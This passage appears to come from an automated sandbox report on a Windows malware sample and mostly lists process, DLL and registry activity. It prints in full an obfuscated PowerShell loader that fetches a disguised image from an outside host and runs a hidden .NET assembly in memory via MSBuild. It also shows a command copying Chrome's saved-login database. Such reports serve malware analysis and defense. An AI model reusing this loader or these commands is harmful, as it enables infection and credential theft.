gTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeFile written: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: firefox.pdbP source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
